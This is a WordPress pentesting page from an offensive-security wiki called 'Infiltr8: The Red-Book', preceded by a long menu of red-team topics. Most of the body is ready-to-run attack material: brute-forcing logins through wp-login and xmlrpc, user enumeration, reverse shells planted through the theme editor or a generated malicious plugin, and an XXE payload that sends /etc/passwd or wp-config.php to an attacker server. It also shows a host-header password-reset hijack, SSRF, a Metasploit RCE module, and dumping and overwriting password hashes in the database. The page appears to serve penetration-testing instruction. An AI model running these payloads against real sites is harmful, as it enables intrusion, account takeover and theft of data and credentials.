Infiltr8: The Red-Book
Infiltr8ForumGitHub
  • The Red-Book
  • Red-Teaming
    • Reconnaissance
      • DNS Enumeration
      • Subdomains enumeration
      • Email Harvesting
      • Host Discovery
      • TCP/UDP Service Scanning
      • Vulnerability Scanning
      • Google Dorks
      • GitHub Recon
      • Files Metadata
      • 🛠️Maltego
      • 🛠️Specialized Search Engines
    • Execution
      • Code & Process Injection
        • Loading .NET Reflective Assembly
        • Loading .NET Assembly from Windows Script Hosting
        • Process Hollowing
        • WndProc Callback Shellcode Execution
        • Fibers Shellcode Execution
        • Vector Exception Handler Shellcode Execution
        • NtQueueApcThread & NtTestAlert Shellcode Execution
        • Thread Pool Callback Shellcode Execution
        • Module Stomping Shellcode Injection
        • Remote .NET Assembly Loading through WaaSRemediation DCOM Abuse
        • 🛠️DLL Injection
        • 🛠️CreateRemoteThread Injection
        • 🛠️Reflective DLL Injection
        • 🛠️NtMapViewOfSection Injection
        • 🛠️SetWindowHookEx Injection
        • 🛠️PoolParty
        • 🛠️MockingJay
      • Code Execution
        • CMSTP
        • MSBuild
        • MSHTA
        • Microsoft Office Execution
        • Windows Script Host (WSH)
        • Outlook Home Page Abuse (Specula)
        • Powershell Without Powershell.exe
        • RegSrv32
        • Scheduled Tasks
        • Services
        • Windows Library Files
        • HTML Help Files
        • WMI
        • Script Exploits
        • 🛠️Sliver
    • Initial Access
      • Network Services
      • Password Attacks
      • Phishing
        • HTML Smuggling
        • Phishing with Calendars (.ICS Files)
        • Phishing With Microsoft Office
          • MS Office - VBA (Macros)
          • MS Office - RTF Files RCE
          • MS Office - Custom XML parts
          • 🛠️MS Office - Excel 4.0 (XLM) Macros
          • 🛠️MS Office - VBA Stomping
          • 🛠️MS Office - Remote Dotm Template Injection
        • 🛠️Phishing via Proxy
          • Adversary in the Middle (AitM) Phishing
            • EvilGoPhish
            • Evilginx
            • Muraena
            • Modlishka
          • Browser in the Middle (BitM) Phishing
            • cuddlephish
            • EvilnoVNC
    • Persistence
      • Active Directory
      • Windows
        • Accessibility features Backdoor
        • AEDebug Keys Persistence
        • Image File Execution Options (IFEO) Persistence
        • Logon Triggered Persistence
        • LSA Persistence
          • Security Support Provider DLLs
          • Authentication Package
        • Natural Language 6 DLLs Persistence
        • Run Keys Persistence
        • Winlogon Persistence
        • WMI Event Subscription Persistence
      • Linux
        • SSH for Persistence
        • GSocket for Persistence
        • 🛠️Udev rules
    • Defense Evasion
      • Endpoint Detection Respons (EDR) Bypass
        • Bring Your Own Vulnerable Driver (BYOVD)
        • Safe Mode With Networking
        • Windows Defender Application Control (WDAC): Killing EDR
        • 🛠️Load Unsigned Drivers
        • 🛠️Minifilter Altitude
        • 🛠️Hypervisor Code Integrity (HVCI) Disallowed Images
        • 🛠️Windows Filtering Platform (WFP)
        • 🛠️Userland Hooking Bypass
      • UAC Bypass
      • AMSI Bypass
      • ETW evasion
      • Living Off The Land
        • Windows Sysinternals
        • LOLBAS Project
        • File Operations
        • File Executions
      • Signature Evasion
      • Obfuscation
        • PowerShell Obfuscation
        • 🛠️Commandline Obfusaction
        • 🛠️PE Obfuscation
        • 🛠️String Encryption
      • AppLocker Bypass
      • Mark-of-the-Web (MotW) Bypass
      • 🛠️PowerShell Constrained Language Mode (CLM) Bypass
      • 🛠️Kill Windows Defender
      • 🛠️Virtualization-based security (VBS) Bypass
        • 🛠️Credential Guard bypass
        • 🛠️hypervisor-protected code integrity (HVCI) Bypass
        • 🛠️Windows Defender Application Control (WDAC) Bypass
      • 🛠️Sandbox Evasion
    • Discovery
      • Active Directory
      • Windows
        • System Information
        • Processes & Services
        • Scheduled Tasks
        • Installed applications
        • Network Configuration
        • FIle/Folder ACLs
        • Knowing your Shell
        • Security Solutions
      • Linux
        • OS Details
        • 🛠️Process & Services
    • Privilege Escalation
      • Windows
        • Tools ⚙️
        • PowerShell Logging
        • Credentials In Files
        • Abusing Tokens
        • Insecure Services
          • Weak Service Permissions
          • Weak File/Folder Permissions
          • Weak Registry Permissions
          • Unquoted Service Path
        • AlwaysInstallElevated
        • AutoLogon Registry
        • Insecure Scheduled Tasks
          • Weak File/Folder Permissions
        • 🛠️DLL Hijacking
      • Linux
        • Kernel Exploits
          • OverlayFs Exploits
            • GameOverlayFs
            • CVE-2023-0386
            • CVE-2021-3493
          • CVE-2023-32233 (CAP_NET_ADMIN)
          • Dirty Pipe
          • 🛠️DirtyCow
          • 🛠️RDS
          • 🛠️Full Nelson
          • 🛠️Mempodipper
        • GLIBC Exploits
          • Looney Tunables
        • Polkit Exploits
          • PwnKit
          • D-Bus Authentication Bypass
        • Sudo Exploits
          • Sudo Binaries
          • Sudo Misconfigurations
          • Reuse Sudo Tokens
          • User Restriction Bypass
          • Pwfeedback BOF
          • Baron Samedit
          • Sudoedit Bypass
        • SUID Binaries
        • Script Exploits
          • Python
            • Pip Download Code Execution
            • PyInstaller Code Execution
            • Pytorch Models/PTH Files Code Execution
          • Ruby
          • Bash
          • Perl
        • Scheduled tasks
          • Cron Jobs
          • Systemd timers
        • Interesting Groups
          • Lxd
        • Capabilities
        • NFS no_root_squash/no_all_squash
        • Linux Active Directory
    • Credential Access
      • Password Stores
        • Windows Credential Manager
        • KeePass
        • Web Browsers
      • Unsecured Credentials
        • Credentials In Files
        • VNC Config
        • SSH Private Keys
        • Git Repositories
        • Veeam Backup
        • Network shares
        • Network protocols
      • OS Credentials
        • Windows & Active Directory
          • SAM & LSA secrets
          • DPAPI secrets
          • NTDS secrets
          • LSASS secrets
          • DCSync
          • Kerberos key list
          • Group Policy Preferences
          • AutoLogon Registry
          • In-memory secrets
          • Cached Kerberos tickets
        • Linux
          • Shadow File
          • In-memory secrets
          • Linux Cached Kerberos tickets
      • MITM and coerced auths
      • Password Attacks
        • Default, weak & Leaked Passwords
        • Generate Wordlists
        • Brute-Force
          • Online - Attacking Services
          • Offline - Password Cracking
      • Impersonation
    • Lateral Movement
      • Port Forwarding
      • TLS Tunneling (Ligolo-ng)
      • HTTP(s) Tunneling
      • SSH Tunneling
      • DNS Tunneling
      • SMB-based
      • WinRM
      • Remote WMI
      • DCOM
      • Scheduled Tasks (ATSVC)
      • Services (SVCCTL)
    • Exfiltration
      • Exfiltration over ICMP
      • Exfiltration Over DNS
      • Exfiltration Over HTTP(s)
      • Exfiltration Over SMB
  • Web Pentesting
    • Reconnaissance
      • Subdomains enumeration
      • WAF Enumeration
    • Infrastructures
      • DBMS
        • Enum Databases
        • Read/Write/Execute
      • DNS
        • Subdomain Takeover
      • Web Servers
        • Nginx
        • Apache
          • Apache Commons Text
          • Apache Tomcat
      • CMS
        • Wordpress
        • 🛠️Joomla
        • 🛠️Drupal
        • 🛠️Bolt CMS
      • Frameworks
        • Spring Framework
          • Spring Routing Abuse
          • Spring Boot Actuators
          • Spring View Manipulation
        • Werkzeug
        • 🛠️Django
        • 🛠️Flask
        • 🛠️Laravel
      • CGI
    • Web Vulnerabilities
      • Server-Side
        • NoSQL Injection
        • SQL Injection
          • UNION Attacks
          • Blind Attacks
            • Boolean Based
            • Time Based
            • Error Based
        • Insecure Deserialization
          • .NET Deserialization
          • Python Deserialization
          • PHP Deserialization
          • 🛠️Java Deserialization
          • 🛠️Ruby Deserialization
        • File Inclusion & Path Traversal
          • LFI to RCE
            • PHP Wrappers
            • Logs Poisoning
            • /proc
            • PHPInfo
            • PHP Sessions
            • Segmentation Fault
          • RFI to RCE
        • Command Injection
        • Brute-Force
        • SSTI (Server-Side Template Injection)
        • Exposed Git Repositories
        • 🛠️File Upload
      • Client-Side
        • XSS (Cross-Site Scripting)
        • CORS (Cross-origin resource sharing)
  • Network Pentesting
    • Network services
      • DNS
      • FastCGI
      • HTTP & HTTPS
      • LDAP
      • NFS
      • MS-RPC
      • MSSQL
      • NBT-NS (NetBIOS)
      • Oracle TNS
      • RDP
      • Rsync
      • SMB
      • SMTP
      • SNMP
      • SSH
      • WebDAV
      • WinRM
      • XMPP/Jabber
      • 🛠️RPC Port Mapper
      • 🛠️FTP
      • 🛠️Telnet
      • 🛠️MySQL
    • WiFi
      • 🛠️WEP
      • 🛠️WPA2
      • 🛠️WPS
    • Bluetooth
  • Active Directory Pentesting
    • Reconnaissance
      • Tools ⚙️
        • PowerView ⚙️
        • Responder ⚙️
        • BloodHound ⚙️
        • enum4linux ⚙️
      • Network
        • DHCP
        • DNS
        • NBT-NS
        • Port scanning
        • SMB
        • LDAP
        • MS-RPC
      • Objects & Settings
        • DACLs
        • Group policies
        • Password policy
        • LAPS
    • Movement
      • Credentials
        • Dumping
        • Cracking
        • Bruteforcing
          • Guessing
          • Spraying
          • Stuffing
        • Shuffling
      • MITM and coerced auths
        • ARP poisoning
        • DNS spoofing
        • DHCP poisoning
        • DHCPv6 spoofing
        • WSUS spoofing
        • LLMNR, NBT-NS, mDNS spoofing
        • ADIDNS poisoning
        • WPAD spoofing
        • MS-EFSR abuse (PetitPotam)
        • MS-RPRN abuse (PrinterBug)
        • MS-FSRVP abuse (ShadowCoerce)
        • MS-DFSNM abuse (DFSCoerce)
        • MS-EVEN abuse (CheeseOunce)
        • PushSubscription abuse
        • WebClient abuse (WebDAV)
        • Living off the land
        • 🛠️NBT Name Overwrite
        • 🛠️ICMP Redirect
      • NTLM
        • Capture
        • Relay
        • Pass the hash
      • Kerberos
        • Pre-auth bruteforce
        • Pass the key
        • Overpass the hash
        • Pass the ticket
        • Pass the cache
        • Forged tickets
          • Silver tickets
          • Golden tickets
          • Diamond tickets
          • Sapphire tickets
          • RODC Golden tickets
          • MS14-068
        • ASREQroast
        • ASREProast
        • Kerberoast
        • Delegations
          • (KUD) Unconstrained
          • (KCD) Constrained
          • (RBCD) Resource-based constrained
          • S4U2self abuse
          • Bronze Bit
        • Shadow Credentials
        • UnPAC the hash
        • Pass the Certificate - PKINIT
        • sAMAccountName spoofing
        • SPN-jacking
      • Netlogon
        • ZeroLogon
      • DACL abuse
        • AddMember
        • ForceChangePassword
        • Targeted Kerberoasting
        • WriteOwner
        • ReadLAPSPassword
        • ReadGMSAPassword
        • Grant ownership
        • Grant rights
        • Logon script
        • Rights on RODC object
      • Group policies
      • Trusts
      • Certificate Services (AD-CS)
        • Certificate templates
        • Certificate authority
        • Access controls
        • Unsigned endpoints
        • Certifried
      • Schannel
        • Pass the Certificate - Schannel
      • SCCM / MECM
        • Privilege Escalation
        • Post Exploitation
      • Exchange services
        • PrivExchange
        • ProxyLogon
        • ProxyShell
        • ProxyNotShell
      • Print Spooler Service
        • PrinterBug
        • PrintNightmare
      • Built-ins & settings
        • Builtin Groups
          • DNSAdmins
          • AD Recycle Bin
        • MachineAccountQuota
        • Pre-Windows 2000 computers
        • RODC
    • Persistence
      • Skeleton key
      • SID History
      • AdminSDHolder
      • GoldenGMSA
      • Kerberos
        • Forged tickets
        • Delegation to KRBTGT
      • Certificate Services (AD-CS)
        • Certificate authority
        • Access controls
        • Golden certificate
      • LAPS
      • 🛠️DC Shadow
      • 🛠️Access controls
  • 🛠️Cloud & CI/CD Pentesting
    • CI/CD
      • Ansible Pentesting
      • Artifactory Pentesting
      • Docker Registry
        • 🛠️HTTP API V2
      • 🛠️Kubernetes
      • 🛠️GitLab
      • 🛠️Github
      • 🛠️Gitea
      • 🛠️Jenkins
      • 🛠️Terraform
    • Azure Pentesting
      • Reconnaissance
        • Tools ⚙️
        • Unauthenticated Reconnaissance
        • Internal Reconnaissance
      • Movement
        • Credentials
          • Password Spraying
          • Token Manipulation
            • Pass-The-Cookie (PTC)
            • Pass the Certificate (Azure)
            • Pass the PRT
        • Aazure Resources
          • Key Vault
          • Storage Accounts
          • Virtual Machines
          • Automation
          • Databases
        • Role-Based Access
        • Conditional Access
        • Service Principals & Applications
        • Hybrid Identity
          • Password Hash Sync (PHS)
          • Pass-through Authentication (PTA)
          • Active Directory Federation Services (ADFS)
          • Seamless SSO
          • Cloud Kerberos Trust
        • Cross-Tenant Access
      • Persistence
    • GCP Pentesting
    • AWS Pentesting
  • 🛠️Smart Contracts Pentesting
    • Solidity
      • Vulnerabilities
        • Delegatecall Attack
        • Denial of Service Attack
        • Overflow & Underflow
        • Reentrancy Attack
        • Self Destruct Attack
        • Tx Origin Attack
Powered by GitBook
On this page
  • Theory
  • Practice
  • Tools
  • Enumerate Wordpress Version
  • Enumerate Users
  • Brute-force Passwords
  • Reverse Shell
  • Vulnerabilities
  • Post-Exploitation
  • Resources

Was this helpful?

Edit on GitHub
  1. Web Pentesting
  2. Infrastructures
  3. CMS

Wordpress

Last updated 1 year ago

Was this helpful?

Theory

WordPress is a popular content management system.

Practice

Tools

is a WordPress security scanner which can enumerate version, themes, plugins and brute-force credentials.

#Enumerate plugins,themes,Timthumbs,config backups,DB exports,users,media and search for vulnerabilities using a free API token (up 50 searchs)
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.vuln.com [--plugins-detection aggressive] [--detection-mode aggressive] [--api-token <API_TOKEN>]

#Specify username and brute-force (it use XML-RPC if available)
#--password-attack xml-rpc will use XML-RPC to brute-force
wpscan --rua --url http://www.vuln.com -U username --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt [--password-attack xml-rpc]

We can use nmap scripting engine to enumerate and brute-force Wordpress

#Brute-force passwords on /wp-login.php 
nmap --script http-wordpress-brute <target-ip>

#Enumerate plugins or themes
nmap --script http-wordpress-enum --script-args type="plugins",search-limit=1500 -p 80 <target-ip>

#Enumerates usernames  by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.
nmap --script http-wordpress-users -p 80 <target-ip>

#Perform all wordpress scans
nmap --script http-wordpress-* -p 80 <target-ip>

Enumerate Wordpress Version

There is the meta tag for WordPress in the head tag of the HTML source code.

<meta name="generator" content="WordPress x.x.x" />

We can use following commands and enumerate wordpress version

curl https://victim.com/ | grep 'content="WordPress'

Check if you can find and read following files

/license.txt
/readme.html

Wordpress version can be found in css links, meta name tag, JavaScript files. We can use following command to extract it

curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Enumerate Users

ID Brute

You get valid users from a WordPress site by Brute Forcing users IDs:

curl -s -I -X GET http://blog.example.com/?author=1

wp-json

You can also try to get information about the users by querying:

curl http://blog.example.com/wp-json/wp/v2/users

Only information about the users that has this feature enable will be provided.

Also note that /wp-json/wp/v2/pages could leak IP addresses.

Login username enumeration

When login in /wp-login.php the message is different if the indicated username exists or not.

we can list the users using the tools listed above:

#Nmap enum users from uid 1 to 50
nmap --script http-wordpress-users --script-args basepath="/wordpress/path",limit=50 -p 80 <target-ip>

#WpScan enum users from uid 1 to 20
wpscan --rua -e u1-20 --url http://www.vuln.com/wordpress/

Brute-force Passwords

You may want to try the default password: admin:password

Check

To check whether you have access, send the following request. If it returns methods, it is enabled:

POST /xmlrpc.php HTTP/1.1
Host: vulnerable.com
[...]

<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>
POST /xmlrpc.php HTTP/1.1
Host: vulnerable.com
[...]

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>https://www.toptal.com/developers/postbin/xxxxxxxxxxxxx-xxxxxxxxxxxxx</string></value></param>
<param><value><string>http://vulnerable.com</string></value></param>
</params>
</methodCall>

Brute-force

wp.getUserBlogs, wp.getCategories or metaWeblog.getUsersBlogs are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:

POST /xmlrpc.php HTTP/1.1
Host: vulnerable.com
[...]

<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>wp.getUsersBlogs</methodName> 
<params>
<param><value>{username}</value></param>
<param><value>{password}</value></param>
</params> 
</methodCall>

We can brute-force password using the tools listed above and Hydra:

#Nmap
nmap --script http-wordpress-brute --script-args uri="/wordpress/path" <target-ip>

#WpScan
wpscan --rua --url http://www.vuln.com -U username --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt [--password-attack xml-rpc]

#Hydra
hydra -L lists/usrname.txt -P lists/pass.txt localhost -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

Reverse Shell

If we have access to a privileged Wordpress account. We can try to execute PHP code from the admin dashboard to get a reverse shell.

It may be possible to edit PHP from the theme used. For this;

  • Access to dashboard (/wp-admin/).

  • Move to "Appearance" and select theme e.g. "Twenty Seventeen".

  • Click "Theme Editor" or "Editor" in the "Appearance" section.

  • In the theme editor, click "404 Template (404.php)" on the right.

  • Access "https://vulnerable.com/wp-content/themes/twentyseventeen/404.php". We should get the target shell in the netcat listener.

It may be possible to upload .php files as a plugin. For this:

  • Access to dashboard (/wp-admin/).

  • Go to Plugins → Plugin Editor.

  • Access "https://example.com/wp-content/plugins/<plugin>/<plugin>.php" We should get the target shell in our netcat listener.

# Generate a malicious plugin and start a listener
python wordpwn.py <ATTACKING_IP> <ATTACKING_PORT> Y

# Just generate a malicious plugin
python wordpwn.py <ATTACKING_IP> <ATTACKING_PORT> N

Then:

  • Access to dashboard (/wp-admin/).

  • Go to Plugins → Upload plugin. (/wp-admin/plugin-install.php?tab=upload)

  • Upload our generated plugin

  • Activate the plugin

  • Trigger the reverse shell by browsing one of the following url

    • http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.php

    • http://(target)/wp-content/plugins/malicious/QwertyRocks.php

You may want to edit the code to change the msfvenom payload, plugin name, or URLs that trigger the reverse shell.

The malicious in the url, is defined by the zip file name.

Vulnerabilities

Unauthenticated View Private/Draft Posts - CVE-2019-17671

This vulnerability could allow an unauthenticated user to view private or draft posts due to an issue within WP_Query.

Versions of WordPress <= 5.2.3 are vulnerable

#Just append ?static=1 to the url
http://wordpress.local/?static=1
http://wordpress.local/?static=1&order=asc

Authenticated XXE (CVE-2021-29447)

If you have user credential and you have Author's permissions, you may exploit this XEE that lead to an arbitrary file disclosure.

Versions of WordPress 5.6-5.7 are vulnerable

First off, create "exploit.wav". (change your ip)

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<ATTACKING_IP>:9001/exploit.dtd'"'"'>%remote;%init;%trick;] >\x00'> exploit.wav

Next create "exploit.dtd". (change the resource var to the wanted file)

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!-- <!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-config.php"> -->
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://<ATTACKING_IP>:9001/?p=%file;'>">

Then we can start the PHP server on the attacking machine

php -S 0.0.0.0:9001

Now, In target website, login as normal user and go to "Media", click "Add New". Upload the "exploit.wav". After that, open the WAV file. You should see the base64 information revealed in your console.

To decode the Base64, create “decode.php” as following.

<?php echo zlib_decode(base64_decode('<Base64_Here>')); ?>

Execute the script to decode it

php decode.php

Crop-image Shell Upload - CVE-2019-8942, CVE-2019-8943

The Crop-image Shell Upload exploit take advantage of a path traversal and a local file inclusion vulnerability on WordPress. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post.

Versions of WordPress 5.0.0 and <= 4.9.8 are vulnerable

#Auto exploit
python3 RCE_wordpress.py <WP_URL> <USER> <PASSWORD> <THEME_NAME>
#Auto exploit
python3 wp_rce.py -t <WP_URL> -u <USER> -p <PASSWORD> -m <THEME_NAME>

You can use exploit/multi/http/wp_crop_rce this way:

msf > use exploit/multi/http/wp_crop_rce
msf exploit(wp_crop_rce) > show targets
    ...targets...
msf exploit(wp_crop_rce) > set TARGET < target-id >
msf exploit(wp_crop_rce) > show options
    ...show and set options...
msf exploit(wp_crop_rce) > exploit

Unauthorized Password Reset - CVE-2017-8295

If an attacker sends a request similar to the one below to a default Wordpress installation that is accessible by the IP address (IP-based vhost):

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

Wordpress will trigger the password reset function for the admin user account. Because of the modified HOST header, the SERVER_NAME will be set to the hostname of attacker's choice. As a result, Wordpress will pass the reset password email to the attacking domain.

SSRF

Try to access following url and the Worpress site may make a request to you.

/wp-json/oembed/1.0/proxy?url=http://10.0.0.1/
quickpress -target https://target.com -server http://burpcollaborator.net

Post-Exploitation

The wp-config.php file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.

With database credentials we can dump username and password and change admin password e.g. with mysql:

#Extract usernames and passwords:
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"

#Change admin password:
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"

Resources

If xml-rpc.php is active you can perform a credentials brute-force or use it to launch DoS attacks to other resources. (You can automate this process for example).

Also, we can use to confirm the results.

Copy and paste the or the .

Insert or PHP code into the file (e.g. plugin_name.php) and update $ip and $port.

Alternatively, we can craft a malicious plugin and install it using the python script.

We can use to perform the attack:

Or we may use

We can use . It checks if the methodName: pingback.ping and for the path /wp-json/oembed/1.0/proxy and if exists, it tries to exploit them.

Wpscan
using this
PostBin
Unix Reverse Shell
Windows one
Unix Reverse Shell
Windows
malicious-wordpress-plugin
v0lck3r's exploit
this exploit
this tool
LogoWordpressHackTricks
LogoWordPress Pentesting | Exploit Noteshideckies